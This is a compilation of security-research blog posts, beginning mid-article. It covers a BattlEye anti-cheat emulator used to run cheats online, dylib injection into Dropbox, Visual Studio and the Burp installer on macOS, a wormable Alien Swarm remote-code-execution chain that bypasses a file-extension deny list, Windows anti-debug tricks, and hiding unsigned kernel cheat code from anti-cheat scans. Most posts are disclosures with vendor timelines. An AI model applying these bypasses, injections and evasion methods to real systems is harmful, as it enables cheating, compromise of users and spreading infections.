    battleye::delegate::o_send_packet(received_packet, sizeof(battleye::be_packet_header));
    break;
}

Emulating the HEARTBEAT packets is done by replying with the received packet:

case battleye::packet_id::HEARTBEAT:    
{
    battleye::delegate::o_send_packet(received_packet, length);
    break;
}

Emulating the REQUEST packets can be done by replaying previously generated responses, which can be logged with code hooks or man-in-the-middle software. These packets are game-specific, and some games might disconnect you for not handling a specific request, but most games only require the first two requests to be handled; afterwards, simply replying with the packet header is enough to avoid being disconnected by the game server. It is important to note that every REQUEST packet is immediately answered with its header, to let the server know that the client is aware of the request. This is how BottlEye emulates them:

case battleye::packet_id::REQUEST:
{
    // IF NOT FRAGMENTED RESPOND IMMEDIATELY, ELSE ONLY RESPOND TO THE LAST FRAGMENT
    const auto respond = 
        !header->fragmented() || 
        (header->fragment.index == header->fragment.count - 1);

    if (!respond)
        return;

    // SEND BACK HEADER
    battleye::delegate::o_send_packet(received_packet, sizeof(battleye::be_packet_header));

    switch (header->sequence)
    {
    case 0x01:
    {
        battleye::delegate::respond(header->sequence,
            {
                // REDACTED BUFFER
            });
        break;
    }
    case 0x02:
    {
        battleye::delegate::respond(header->sequence, 
            {    
                // REDACTED BUFFER
            });
        break;
    }
    default:
        break;
    }
    break;
}

Which uses the following helper function for responses:

void battleye::delegate::respond(
    std::uint8_t response_index, 
    std::initializer_list<std::uint8_t> data)
{
    // SETUP RESPONSE PACKET WITH TWO-BYTE HEADER + NO-FRAGMENTATION TOGGLE

    const auto size = sizeof(battleye::be_packet_header) + 
                      sizeof(battleye::be_fragment::count) + 
                      data.size();

    auto packet = std::make_unique<std::uint8_t[]>(size);
    auto packet_buffer = packet.get();

    packet_buffer[0] = (battleye::packet_id::RESPONSE); // PACKET ID
    packet_buffer[1] = (response_index - 1);            // RESPONSE INDEX
    packet_buffer[2] = (0x00);                          // FRAGMENTATION DISABLED


    for (size_t i = 0; i < data.size(); i++)
    {
        packet_buffer[3 + i] = data.begin()[i];
    }

    battleye::delegate::o_send_packet(packet_buffer, size);
}

BottlEye

The full BottlEye project can be found on our GitHub repository. Below you can see this specific project being used in various popular video games.

Fortnite

The following video contains a live demonstration of my BottlEye project being used in the BattlEye-protected game Fortnite. In the video I live-debug Fortnite while playing online to prove that BattlEye is not loaded.

Insurgency

The following screenshot shows the BattlEye-protected game Insurgency running on Arch in Wine.

Escape from Tarkov

The following screenshot shows the usage of Cheat Engine in the popular, BattlEye-protected game Escape from Tarkov. This is possible because BattlEye has been replaced with BottlEye on disk.

Thanks to

  • Sabotage
  • Tamimego
  • Atex
  • namazso

Abusing MacOS Entitlements for code execution

By: impost0r
14 August 2020 at 23:00

Recently I disclosed some vulnerabilities to Dropbox and PortSwigger via H1 and Microsoft via MSRC pertaining to Application entitlements on MacOS. We’ll be exploring what entitlements are, what exactly you can do with them, and how they can be used to bypass security products.

These are all unpatched as of publication.

What’s an Entitlement?

On MacOS, an entitlement is a string that grants an Application specific permissions to perform specific tasks that may have an impact on the integrity of the system or user privacy. Entitlements can be viewed with the command codesign -d --entitlements - $file.

Viewing the entitlements of the main Dropbox binary.

In the above image, we can see the key entitlements com.apple.security.cs.allow-unsigned-executable-memory and com.apple.security.cs.disable-library-validation - they allow exactly what they say on the tin. We’ll explore Dropbox first, as it’s the more involved of the two to exploit.

Dropbox

Just as Windows has PE and Linux has ELF, MacOS has its own executable format, Mach-O (short for Mach-Object). Mach-O files are used on all Apple products, ranging from iOS, to tvOS, to MacOS. In fact, all these operating systems share a common heritage stemming from NeXTStep, though that’s beyond the scope of this article.

MacOS has a variety of security protections in place, including Gatekeeper, AMFI (AppleMobileFileIntegrity), SIP (System Integrity Protection, a form of mandatory access control), code signing, etc. Gatekeeper is akin to Windows SmartScreen in that it fingerprints files, checks them against a list on Apple’s servers, and returns the value to determine if the file is safe to run.

This is vastly simplified.

There are three configurable options, though the third is hidden by default - App Store only, App Store and identified developers, and “anywhere”, the third presumably hidden to minimize accidental compromise. Gatekeeper can also be managed by the command line tool, spctl(8), for more granular control of the system. One can even disable Gatekeeper entirely through spctl --master-disable, though this requires superuser access. It’s to be noted that this does not invalidate rules already in the System Policy database (/var/db/SystemPolicy), but allows anything not in the database, regardless of notarization, etc, to run unimpeded.

Now, back to Dropbox. Dropbox is compiled using the hardened runtime, meaning that without specific entitlements, JIT code cannot be executed, DYLD environment variables are automatically ignored, and unsigned libraries are not loaded (often resulting in a SIGKILL of the binary.) We can see that Dropbox allows unsigned executable memory, allowing shellcode injection, and has library validation disabled - meaning that any library can be inserted into the process. But how?

Using LIEF, we can easily add a new LoadCommand to Dropbox. In the following picture, you can see my tool, Coronzon, which is based off of yololib, doing the same.

Adding a LoadCommand to Dropbox

import lief

file = lief.parse('Dropbox')
file.add_library('inject.dylib')
file.write('Dropbox')

Using code similar to the following, one can execute code within the context of the Dropbox process, albeit at the cost of voiding the code signature. You’ll either have to strip the code signature or ad-hoc sign the binary to get it to run from /Applications/, though the application will then lose any entitlements and TCC rights previously granted. Otherwise, you’ll have to use a technique known as dylib proxying - which is to say, replacing a library that is part of the application bundle with one of the same name that re-exports the library it’s replacing (using the link-time flags -Xlinker -reexport_library $(PATH_TO_LIBRARY)).

#include <stdio.h>
#include <stdlib.h>
#include <syslog.h>

__attribute__((constructor))
static void customConstructor(int argc, const char **argv)
{
    printf("Hello from dylib!\n");
    syslog(LOG_ERR, "Dylib injection successful in %s\n", argv[0]);
    system("open -a Calculator");
}

This is a simple example, but combined with something like frida-gum the impact becomes much more severe - allowing application introspection and runtime modification without the user’s knowledge. This makes for a great, persistent usermode implant, as Dropbox is added as a LaunchItem.

Visual Studio

Microsoft releases a cut-down version of their premier IDE for MacOS, mainly for C# development with Xamarin, .NET Core, and Mono. Though ‘cut-down’, it still supports many features of the original, including NuGet, IntelliSense, and more.

It also has some interesting entitlements.

Viewing the entitlements of the main Visual Studio binary.

Of course, MacOS users are treated as second class citizens in Microsoft’s ecosystem and Microsoft could not give a damn about the impact this has on the end user - which is similar in impact to the above, albeit more severe. We can see that basically every single feature of the hardened runtime is disabled - enabling the simplest of code injection methods, via the DYLD_INSERT_LIBRARIES environment variable. The following video is a proof of concept of just how easily code can be executed within the context of Visual Studio.

Keep in mind: code executing in this context will inherit the entitlements and TCC values of the parent. It’s not hard to imagine a scenario in which IP (intellectual property) theft could result from Microsoft’s attempts at ‘hardening’ Visual Studio for Mac. As with Dropbox, all the security implications are the same, yet it’s about 30x easier to pull off as DYLD environment variables are allowed.

Burp Suite

I’m sure most reading this article are familiar with Burp Suite. If not - it’s a web exploitation Swiss army knife that aids in recon, pre, and post-exploitation. So why don’t we exploit it?

This time, we’ll be exploiting the Burp Suite installer. As you’ll probably guess by now, it has some… interesting entitlements.

Viewing the entitlements of the Burp Installer stub.

Aside from the output lacking newlines, exploitation in this case is different. There are no shell scripts in the installer (nor is the entitlement for allowing DYLD environment variables present), and if we’re going to create a malicious installer, we need to use what’s already packaged. So, we’ll tamper with the JRE (jre.tar.gz) that’s included with the installer.

There are actually two approaches to this - replacing a dylib outright or dylib hijacking. Dylib hijacking is similar to its counterpart on Windows, DLL hijacking, in that it abuses the executable searching for a library that may or may not be there, usually specified by @rpath or sometimes a ‘weakref’. A weakref is a library that doesn’t need to be loaded, but can be loaded. For more information on dylib hijacking, I recommend this excellent presentation by Patrick Wardle of Objective-See. For brevity, however, we’ll just be replacing a .dylib in the JRE.
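To illustrate why @rpath makes hijacking possible, here is a rough sketch of how an @rpath-relative install name expands into an ordered list of candidate paths. The function name rpath_candidates is hypothetical, and the sketch assumes the run paths are already absolute (it does not expand @loader_path or @executable_path). The loader takes the first candidate that exists, so a missing entry early in the list that an attacker can write to is a hijacking opportunity.

```cpp
#include <string>
#include <vector>

// Expand an "@rpath/..." install name against each run path, in order.
// Names without the "@rpath/" prefix are returned unchanged as the only candidate.
inline std::vector<std::string> rpath_candidates(
    const std::vector<std::string>& run_paths,
    const std::string& install_name)
{
    const std::string prefix = "@rpath/";
    std::vector<std::string> candidates;

    if (install_name.compare(0, prefix.size(), prefix) != 0)
    {
        candidates.push_back(install_name);
        return candidates;
    }

    const std::string leaf = install_name.substr(prefix.size());
    for (const auto& run_path : run_paths)
    {
        std::string candidate = run_path;
        if (candidate.empty() || candidate.back() != '/')
            candidate += '/';
        candidates.push_back(candidate + leaf);
    }
    return candidates;
}
```

Comparing this list against what actually exists on disk is essentially what a dylib hijack scanner does.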

The way the installer executes is that it extracts the JRE to a temporary location during install, which is used for the rest of the install. This temporary location is randomized and actually adds a layer of obfuscation to our attack, as no two executions will have the JRE extracted into the same place. Once the JRE is extracted, it’s loaded and attempts to install Burp Suite. This allows us to execute unsigned code under the guise and context of Burp Suite, running code in the background unbeknownst to the user. Thankfully Burp Suite doesn’t (currently) require elevated privileges to install on macOS. Nonetheless, this is an issue due to the ease of forging a malicious installer and the fact that Gatekeeper is none the wiser.

A proof of concept can be viewed below.

Conclusions

Entitlements are a valuable component of MacOS’ security model, but they can also be a double-edged sword. You’ve seen how trivially Gatekeeper and existing OS protections can be bypassed by leveraging a weak application as a trampoline - the one with the most impact in this case I argue to be Dropbox, due to inheritance of Dropbox’s TCC permissions and its being a LaunchItem, thus gaining persistence. Entitlements therefore provide a valuable addition to the attack surface of MacOS for any red-teamer or bug-bounty hunter. Your mileage may vary, however - Dropbox and Microsoft didn’t seem to care much. (PortSwigger, on the other hand, admitted that due to the design of Burp Suite and inherent language intrinsics it’s extremely hard to prevent such an attack - and I don’t fault them).

Happy hacking.

Disclosure Timelines


Dropbox

  • June 11th, initial disclosure
  • June 17th, additional information added
  • June 20th, closed as Informative

Visual Studio

  • June 19th, initial disclosure
  • June 22nd, closed (“Upon investigation, we have determined that this submission does not meet the bar for security servicing. This report does not appear to identify a weakness in a Microsoft product or service that would enable an attacker to compromise the integrity, availability, or confidentiality of a Microsoft offering.”)

Burp Suite

  • June 27th, initial disclosure
  • June 30th, closed as Informative

Wormable remote code execution in Alien Swarm

By: mev
30 October 2020 at 23:00

Alien Swarm was originally a free game released circa July 2010. It differs from most Source Engine games in that it is a top-down shooter, though with gameplay elements not dissimilar from Left 4 Dead. Although the original has fallen by the wayside, a small but dedicated community has expanded the game with Alien Swarm: Reactive Drop. The game averages about 800 users per day at peak, and is still actively updated.

Over a decade ago, multiple logic bugs in Source and GoldSrc titles allowed execution of arbitrary code from client to server and vice versa, allowing plugins to be stolen or arbitrary data to be written in either direction. We’ll be exploring a modern-day example of this, in Alien Swarm: Reactive Drop.

Client <-> Server file upload

Any Alien Swarm client can upload files to the game server (and vice versa) using the CNetChan->SendFile API, although with some questionable constraints: a client-side check in the game prevents the server from uploading files of certain extensions such as .dll, .cfg:

if ( (!(*(unsigned __int8 (__thiscall **)(int, char *, _DWORD))(*(_DWORD *)(dword_104153C8 + 4) + 40))(
         dword_104153C8 + 4,
         filename,
         0)
   || should_redownload_file((int)filename))
  && !strstr(filename, "//")
  && !strstr(filename, "\\\\")
  && !strstr(filename, ":")
  && !strstr(filename, "lua/")
  && !strstr(filename, "gamemodes/")
  && !strstr(filename, "addons/")
  && !strstr(filename, "..")
  && CNetChan::IsValidFileForTransfer(filename) ) // fails if filename ends with ".dll" and more
{ /* accept file */ }

bool CNetChan::IsValidFileForTransfer( const char *input_path )
{
    char fixed_slashes[260];

    if (!input_path || !input_path[0])
        return false;

    int l = strlen(input_path);
    if (l >= sizeof(fixed_slashes))
        return false;

    strncpy(fixed_slashes, input_path, sizeof(fixed_slashes));
    FixSlashes(fixed_slashes, '/');
    if (fixed_slashes[l-1] == '/')
        return false;

    if (
        stristr(input_path, "lua/")
        || stristr(input_path, "gamemodes/")
        || stristr(input_path, "scripts/")
        || stristr(input_path, "addons/")
        || stristr(input_path, "cfg/")
        || stristr(input_path, "~/")
        || stristr(input_path, "gamemodes.txt")
        )
        return false;

    const char *ext = strrchr(input_path, '.');
    if (!ext)
        return false;

    int ext_len = strlen(ext);
    if (ext_len > 4 || ext_len < 3)
        return false;

    const char *check = ext;
    while (*check)
    {
        if (isspace(*check))
            return false;

        ++check;
    }

    if (!stricmp(ext, ".cfg") ||
        !stricmp(ext, ".lst") ||
        !stricmp(ext, ".lmp") ||
        !stricmp(ext, ".exe") ||
        !stricmp(ext, ".vbs") ||
        !stricmp(ext, ".com") ||
        !stricmp(ext, ".bat") ||
        !stricmp(ext, ".dll") ||
        !stricmp(ext, ".ini") ||
        !stricmp(ext, ".log") ||
        !stricmp(ext, ".lua") ||
        !stricmp(ext, ".nut") ||
        !stricmp(ext, ".vdf") ||
        !stricmp(ext, ".smx") ||
        !stricmp(ext, ".gcf") ||
        !stricmp(ext, ".sys"))
        return false;

    return true;
}

Bypassing "//" and ".." can be done with "/\\", because the call to FixSlashes that normalizes the slashes happens after the sanity check. In place of "..", the "/\\" sets the path to the root of the drive, so we can write anywhere on the system if we know the path. Bypassing "lua/", "gamemodes/" and "addons/" can be done by using capital letters, e.g. "ADDONS/", since file paths are not case-sensitive on Windows.
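The ordering problem is easy to reproduce in isolation. The sketch below mirrors only the strstr filters from the decompiled check; it does not model the virtual call, should_redownload_file or IsValidFileForTransfer. Both passes_substring_filters and fix_slashes are hypothetical stand-ins written for this illustration, not engine code.

```cpp
#include <algorithm>
#include <cstring>
#include <string>

// Mirrors only the case-sensitive strstr() filters from the check above.
inline bool passes_substring_filters(const char* filename)
{
    return !std::strstr(filename, "//")
        && !std::strstr(filename, "\\\\")
        && !std::strstr(filename, ":")
        && !std::strstr(filename, "lua/")
        && !std::strstr(filename, "gamemodes/")
        && !std::strstr(filename, "addons/")
        && !std::strstr(filename, "..");
}

// Simplified stand-in for FixSlashes(path, '/'): turn every backslash
// into a forward slash.
inline std::string fix_slashes(std::string path)
{
    std::replace(path.begin(), path.end(), '\\', '/');
    return path;
}
```

A name starting with a forward slash followed by a backslash passes the filters, yet becomes "//" once the slashes are normalized; likewise "ADDONS/" passes where "addons/" does not.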

Bypassing the file extension check is a bit more tricky, so let’s look at the structure sent by SendFile called dataFragments_t:

typedef struct dataFragments_s
{
    FileHandle_t    file;                 // open file handle
    char            filename[260];        // filename
    char*           buffer;               // if NULL it's a file
    unsigned int    bytes;                // size in bytes
    unsigned int    bits;                 // size in bits
    unsigned int    transferID;           // only for files
    bool            isCompressed;         // true if data is bzip compressed
    unsigned int    nUncompressedSize;    // full size in bytes
    bool            isReplayDemo;         // if it's a file, is it a replay .dem file?
    int             numFragments;         // number of total fragments
    int             ackedFragments;       // number of fragments send & acknowledged
    int             pendingFragments;     // number of fragments send, but not acknowledged yet
} dataFragments_t;

The 260-byte filename buffer in dataFragments_t is used for the file name checks and filters, but is later copied and truncated to 256 bytes after all the sanity checks, thus removing our fake extension and exposing the malicious one:

Q_strncpy( rc->gamePath, gamePath, BufferSize /* BufferSize = 256 */ );

Using a file name such as ./././(...)/file.dll.txt (pad to max length with ./) would get truncated to ./././(...)/file.dll on the receiving end after checking if the file extension is valid. This also has the side effect that we can overwrite files as the file exists check is done before the file extension truncation.
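The padding arithmetic can be sketched as follows. This assumes the bounded copy keeps at most 255 characters plus a terminator, which is my reading of a 256-byte Q_strncpy rather than something verified here. build_truncating_name and truncated_copy are hypothetical helpers for illustration only.

```cpp
#include <cstddef>
#include <string>

// Pad real_name with "./" so that it ends exactly at the truncation point,
// then append a harmless-looking decoy extension.
// Returns an empty string if the padding cannot be made to fit.
inline std::string build_truncating_name(
    const std::string& real_name,
    const std::string& decoy_ext,
    std::size_t copy_size = 256)
{
    const std::size_t kept = copy_size - 1; // characters surviving the copy
    if (real_name.size() > kept)
        return {};

    const std::size_t pad = kept - real_name.size();
    if (pad % 2 != 0) // "./" is two characters wide
        return {};

    std::string name;
    for (std::size_t i = 0; i < pad / 2; ++i)
        name += "./";

    name += real_name;
    name += decoy_ext;
    return name;
}

// Models a bounded copy that keeps at most copy_size - 1 characters.
inline std::string truncated_copy(const std::string& name, std::size_t copy_size = 256)
{
    return name.substr(0, copy_size - 1);
}
```

With a nine-character target such as evil1.dll and the decoy .txt, the result is 259 characters long, which still fits the 260-byte buffer, and the copy cuts it back to a name ending in .dll. An eight-character target leaves an odd amount of padding, so the base name needs one extra character.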

Remote code execution

Using the aforementioned remote file inclusion, we can upload Source Engine config files which have the potential to execute arbitrary code. Using Procmon, I discovered that the game engine searches for the config file in both platform/cfg and swarm/cfg:

procmon

We can simply upload a malicious plugin and config file to platform/cfg and hijack the server. This is due to the fact that the Source Engine server config has the capability to load plugins with the plugin_load command:

plugin_load addons/alien_swarm_exploit.dll

This will load our dynamic library into the game server application, granting arbitrary code execution. The only constraint is that the newmapsettings.cfg config file is only reloaded on map change, so you will have to wait till the end of a game.

Wormable demonstration

Since both of these exploits apply to both the server and the client, we can infect a server, which can infect all players, which can carry on the virus when playing other servers. This makes this exploit chain completely wormable and nothing but a complete shutdown of the game servers can fix it.

Timeline

  • [2020-05-12] Reported to Valve on HackerOne
  • [2020-05-13] Triaged by Valve: “Looking into it!”
  • [2020-08-03] Patched in beta branch
  • [2020-08-18] Patched in release

New year, new anti-debug: Don’t Thread On Me

By: jm
4 January 2021 at 23:00

With 2020 over, I’ll be releasing a bunch of new anti-debug methods that you most likely have never seen. To start off, we’ll take a look at two new methods, both relating to thread suspension. They aren’t the most revolutionary or useful, but I’m keeping the best for last.

Bypassing process freeze

This one is a cute little thread creation flag that Microsoft added into 19H1. Ever wondered why there is a hole in thread creation flags? Well, the hole has been filled with a flag that I’ll call THREAD_CREATE_FLAGS_BYPASS_PROCESS_FREEZE (I have no idea what it’s actually called) whose value is, naturally, 0x40.

To demonstrate what it does, I’ll show how PsSuspendProcess works:

NTSTATUS PsSuspendProcess(_EPROCESS* Process)
{
  const auto currentThread = KeGetCurrentThread();
  KeEnterCriticalRegionThread(currentThread);

  NTSTATUS status = STATUS_SUCCESS;
  if ( ExAcquireRundownProtection(&Process->RundownProtect) )
  {
    auto targetThread = PsGetNextProcessThread(Process, nullptr);
    while ( targetThread )
    {
      // Our flag in action
      if ( !targetThread->Tcb.MiscFlags.BypassProcessFreeze )
        PsSuspendThread(targetThread, nullptr);

      targetThread = PsGetNextProcessThread(Process, targetThread);
    }
    ExReleaseRundownProtection(&Process->RundownProtect);
  }
  else
    status = STATUS_PROCESS_IS_TERMINATING;

  if ( Process->Flags3.EnableThreadSuspendResumeLogging )
    EtwTiLogSuspendResumeProcess(status, Process, Process, 0);

  KeLeaveCriticalRegionThread(currentThread);
  return status;
}

So as you can see, NtSuspendProcess, which calls PsSuspendProcess, will simply ignore any thread with this flag. Another bonus is that the thread also doesn’t get suspended by NtDebugActiveProcess! As far as I know, there is no way to query or disable the flag once a thread has been created with it, so you can’t do much against it.

As far as its usefulness goes, I’d say this is just a nice little extra against dumping, and it causes confusion when you click suspend in Process Hacker and the process continues to chug on as if nothing happened.

Example

For example, here is a somewhat funny piece of code that will keep printing I am running. I am sure that seeing this while reversing would cause a lot of confusion about why the hell one would suspend their own process.

#define THREAD_CREATE_FLAGS_BYPASS_PROCESS_FREEZE 0x40

NTSTATUS printer(void*) {
    while(true) {
        std::puts("I am running"); // puts appends the newline itself
        Sleep(1000);
    }
    return STATUS_SUCCESS;
}

HANDLE handle;
NtCreateThreadEx(&handle, MAXIMUM_ALLOWED, nullptr, NtCurrentProcess(),
                 &printer, nullptr, THREAD_CREATE_FLAGS_BYPASS_PROCESS_FREEZE,
                 0, 0, 0, nullptr);

NtSuspendProcess(NtCurrentProcess());

Suspend me more

Continuing the trend of NtSuspendProcess being badly behaved, we’ll again abuse how it works to detect whether our process was suspended.

The trick lies in the fact that suspend count is a signed 8-bit value. Just like for the previous one, here’s some code to give you an understanding of the inner workings:

ULONG KeSuspendThread(_ETHREAD *Thread)
{
  auto irql = KeRaiseIrql(DISPATCH_LEVEL);
  KiAcquireKobjectLockSafe(&Thread->Tcb.SuspendEvent);

  auto oldSuspendCount = Thread->Tcb.SuspendCount;
  if ( oldSuspendCount == MAXIMUM_SUSPEND_COUNT ) // 127
  {
    _InterlockedAnd(&Thread->Tcb.SuspendEvent.Header.Lock, 0xFFFFFF7F);
    KeLowerIrql(irql);
    ExRaiseStatus(STATUS_SUSPEND_COUNT_EXCEEDED);
  }

  auto prcb = KeGetCurrentPrcb();
  if ( KiSuspendThread(Thread, prcb) )
    ++Thread->Tcb.SuspendCount;

  _InterlockedAnd(&Thread->Tcb.SuspendEvent.Header.Lock, 0xFFFFFF7F);
  KiExitDispatcher(prcb, 0, 1, 0, irql);
  return oldSuspendCount;
}

If you take a look at the first code sample, PsSuspendProcess has no error checking and doesn’t care if a thread can’t be suspended anymore. So what happens when you call NtResumeProcess? It decrements the suspend count! All we need to do is max it out, and when someone decides to suspend and resume us, they’ll actually leave the count in a state it wasn’t previously in.
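The counting logic can be modelled in plain user-mode C++ to see why this works. This is only a toy model of the behaviour described above, not kernel code; model_thread and the functions around it are hypothetical names.

```cpp
#include <cstdint>

constexpr std::int8_t kMaxSuspendCount = 127;

struct model_thread
{
    std::int8_t suspend_count = 0;
};

// Returns false where the kernel would raise STATUS_SUSPEND_COUNT_EXCEEDED.
inline bool suspend_thread(model_thread& thread)
{
    if (thread.suspend_count == kMaxSuspendCount)
        return false;
    ++thread.suspend_count;
    return true;
}

inline void resume_thread(model_thread& thread)
{
    if (thread.suspend_count > 0)
        --thread.suspend_count;
}

// The process-wide suspend ignores the per-thread failure,
// just as PsSuspendProcess does.
inline void suspend_process(model_thread& thread) { (void)suspend_thread(thread); }
inline void resume_process(model_thread& thread)  { resume_thread(thread); }

// Detection probe: with the count maxed out, a suspend that succeeds
// means somebody resumed the thread in the meantime.
inline bool was_suspended_and_resumed(model_thread& thread)
{
    return suspend_thread(thread);
}
```

After maxing out the count, a suspend/resume pair from a debugger leaves it at 126, so the next probe succeeds instead of failing, and that is the tell.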

Example

The simple code below is rather effective:

  • Visual Studio - prevents it from pausing the process once attached.
  • WinDbg - gets detected on attach.
  • x64dbg - pause button becomes sketchy with error messages like “Program is not running” until you manually switch to the main thread.
  • ScyllaHide - older versions used NtSuspendProcess and caused it to be detected, but it was fixed once I reported it.

for(size_t i = 0; i < 128; ++i)
  NtSuspendThread(thread, nullptr);

while(true) {
  if(NtSuspendThread(thread, nullptr) != STATUS_SUSPEND_COUNT_EXCEEDED)
    std::puts("I was suspended"); // puts appends the newline itself
  Sleep(1000);
}

Conclusion

If anything, I hope that this demonstrated that it’s best not to rely on NtSuspendProcess to work as well as you’d expect for tools dealing with potentially malicious or protected code. Hope you liked this post and expect more content to come out in the upcoming weeks.

Hiding execution of unsigned code in system threads

By: drew
12 January 2021 at 00:00

Anti-cheat development is, by nature, reactive; anti-cheats exist to respond to and thwart a videogame’s population of cheaters. For instance, a videogame with an exceedingly low number of cheaters would have little need for an anti-cheat, while a videogame rife with cheaters would have a clear need for one. In order to catch cheaters, anti-cheats will employ as many methods as possible. Unfortunately, anti-cheats are not omniscient; they cannot know of every single method or detection vector to catch cheaters. Likewise, the game hacks themselves must continue to discover new or unique methods in order to evade anti-cheats.

The Reactive Development Cycle of Game Hacking

This brings forth a reactive and continuous development cycle for both the cheats and anti-cheats: one party (cheat or anti-cheat) will employ a unique method to circumvent the other (anti-cheat or cheat), which will then do the same in response.

One such method employed by an increasing number of anti-cheats is to execute core anti-cheat functions from within the operating system’s kernel. A clear advantage over the alternative (i.e. usermode execution) is that, on Windows NT systems, the anti-cheat can selectively filter which processes are able to interact with the memory of the game process it is protecting, thus nullifying a plethora of methods used by game hacks.

In response to this, many (but not all) hack developers made (or are making) the decision to do the same; they too would, or will, execute their hack, either wholly or in part, from within the operating system’s kernel, thus nullifying what the anti-cheats had done.

Unlike with anti-cheats, however, this decision carries with it numerous concessions: namely, the fact that, for various reasons, it is most convenient (or it is only practical) to execute the hack as an unsigned kernel driver running without the kernel’s knowledge; the “driver” is typically a region of executable memory in the kernel’s address space and is never loaded or allocated by the kernel. In other words, it is a “manually-mapped” driver, loaded by a tool used by a game hack.

This ultimately provides anti-cheats with many opportunities to detect so-called “kernel-mode” or “ring 0” game hacks (noting that those terms are typically said with a marketable significance; they are literally used to market such game hacks, as if to imply robustness or security); if the anti-cheat can prove that the system is executing, or had executed, unsigned code, it can then potentially flag a user as being a cheater.

Analyzing a Thread’s Kernel Stack

One such method - the focus of this article, in fact - of detecting unsigned code execution in the kernel is to iterate each thread that is running in the system (optionally deciding to only iterate threads associated with the system process, i.e. system threads) and to initiate some kind of stack trace.

Bluntly, this allows the anti-cheat to quite effectively determine if a cheat were executing unsigned code. For example, some anti-cheats (e.g. BattlEye) will queue to each system thread an APC which will then initiate a stack trace. If the stack trace returns an instruction pointer that is not within the confines of any loaded kernel driver, the anti-cheat can then know that it may have encountered a system thread that is executing unsigned code. Furthermore, because it is a stack trace and not a direct sampling of the return instruction pointer, it would work quite reliably, even if a game hack were, for example, executing a spin-loop or continuous wait; the stack trace would always lead back to the unsigned code.
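The core of such a check boils down to a range test over the captured frames. Below is a user-mode sketch of that idea only; module_range, is_backed_by_module and first_unbacked_frame are hypothetical names, and a real anti-cheat would obtain the module list and the frames from the kernel rather than from vectors.

```cpp
#include <cstddef>
#include <cstdint>
#include <vector>

// Hypothetical description of one loaded driver image.
struct module_range
{
    std::uint64_t base;
    std::uint64_t size;
};

// True if the address lies inside any of the given module images.
inline bool is_backed_by_module(std::uint64_t address,
                                const std::vector<module_range>& modules)
{
    for (const auto& module : modules)
    {
        if (address >= module.base && address - module.base < module.size)
            return true;
    }
    return false;
}

// Returns the index of the first frame that is outside every module,
// or -1 if every frame is backed by a loaded module.
inline int first_unbacked_frame(const std::vector<std::uint64_t>& frames,
                                const std::vector<module_range>& modules)
{
    for (std::size_t i = 0; i < frames.size(); ++i)
    {
        if (!is_backed_by_module(frames[i], modules))
            return static_cast<int>(i);
    }
    return -1;
}
```

Any frame that resolves to no module is a candidate for closer inspection, which is why a manually-mapped driver stands out in a trace.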

It is quite clear to any cheat developer that they can respond to this behavior by simply running their thread(s) with kernel APCs disabled, preventing delivery of such APCs and avoiding the detection vector. As will be seen, however, this method does not entirely prevent detection of unsigned code execution.

(Copying Out, Then) Analyzing a Thread’s Kernel Stack

Certain anti-cheats - EasyAntiCheat, in particular - had a much more apt method of generating a pseudo-stacktrace: instead of generating a stack trace with a blockable APC, why not copy the contents of the thread’s kernel stack asynchronously? Continuing the reactive cheat-anti-cheat development cycle, EasyAntiCheat had opted to manually search for instances of nonpaged code pointers that may have been left behind as a result of system thread execution.

While the downsides of this method are debatable, the upside is quite clear: as long as the thread is making procedure calls (e.g. x86 call instruction) from within its own code, either to kernel routines or to its own, and regardless of its IRQL or if the thread is even running, its execution will leave behind detectable traces on its stack in the form of pointers to its own code which can be extracted and analyzed.
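As a rough illustration of the scanning step, the sketch below walks a copied stack in pointer-sized steps and records every slot whose value falls inside a range of interest. How an anti-cheat actually decides which ranges are suspicious is not covered here; address_range and find_code_pointers are hypothetical, and the suspect range simply stands in for that criterion.

```cpp
#include <cstddef>
#include <cstdint>
#include <cstring>
#include <vector>

// Half-open address range [begin, end).
struct address_range
{
    std::uint64_t begin;
    std::uint64_t end;
};

// Scan a copied stack for 64-bit values that point into the suspect range.
// Returns the byte offsets of the matching slots within the copy.
inline std::vector<std::size_t> find_code_pointers(
    const std::uint8_t* stack_copy,
    std::size_t size,
    address_range suspect)
{
    std::vector<std::size_t> offsets;
    for (std::size_t offset = 0;
         offset + sizeof(std::uint64_t) <= size;
         offset += sizeof(std::uint64_t))
    {
        // memcpy avoids unaligned or aliasing-unsafe reads from the byte buffer.
        std::uint64_t value = 0;
        std::memcpy(&value, stack_copy + offset, sizeof(value));

        if (value >= suspect.begin && value < suspect.end)
            offsets.push_back(offset);
    }
    return offsets;
}
```

Because the scan works on a copy, it needs no cooperation from the target thread, which is what makes disabling APCs ineffective against it.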

Callouts: Continuing The Reactive Development Cycle

Proposed is the “callout” method of system thread execution, born from the recognition that:

  1. A thread’s kernel stack, as identified by the kernel stack pointer in a thread’s ETHREAD object, can be analyzed asynchronously by a potential anti-cheat to detect traces of unsigned code execution; and that
  2. To be useful in most cases, a system thread must be able to make calls to most external NT kernel or executive procedures with little compromise.

The Life-cycle of the Callout Thread

The life-cycle of a callout thread is quite simple and can be used to demonstrate its implementation:

  • Before thread creation:
    • Allocate a non-paged stack to be loaded by the thread; the callout thread’s “real stack”
    • Allocate shellcode (ideally in executable memory not associated with the main driver module) which disables interrupts, preserves the old/kernel stack pointer (as it was on function entry), loads the real stack, and jumps to an initialization routine (the callout thread’s “bootstrap routine”)
    • Create a system thread (i.e. PsCreateSystemThread) whose start address points to the initialization shellcode
  • At thread entry (i.e. the bootstrap routine):
    • Preserve the stack pointer that had been given to the thread at thread entry (this must be given by the shellcode)
    • (Optionally) Iterate the thread’s old/kernel stack pointer, ceasing iteration at the stack base, eliminating any references/pointers to the initialization shellcode
    • (Optionally) Eliminate references to the initialization shellcode within the thread’s ETHREAD; for example, it may be worth changing the thread’s start address
    • (Optionally, but recommended) Free the memory containing the initialization shellcode, if it was allocated separately from the driver module
    • Proceed to thread execution

In clearer terms, the callout thread spends most of its time executing the driver’s unsigned code with interrupts disabled and with its own kernel stack - the real stack. It can also attempt to wipe any other traces of its execution which may have been present upon its creation.

The Usefulness of the Callout Thread

The callout thread must also be capable of executing most, if not all, NT kernel and executive procedures. As proposed, this is effectively impossible; the thread must run with interrupts disabled and with its own stack, thus creating an obvious problem as most procedures of interest would run at an IRQL <= DISPATCH_LEVEL. Furthermore, the NT IRQL model may be liable to ignore our setting of the interrupt flag, causing most routines to unpredictably enter a deadlock or enable interrupts without our consent.

A mechanism to allow for a callout thread to invoke these routines of interest, the callout mechanism, is therefore used to:

  1. Provide a routine which can be used to conveniently invoke (“call out”) an external function; and in this routine,
  2. Load the thread’s original/kernel stack pointer;
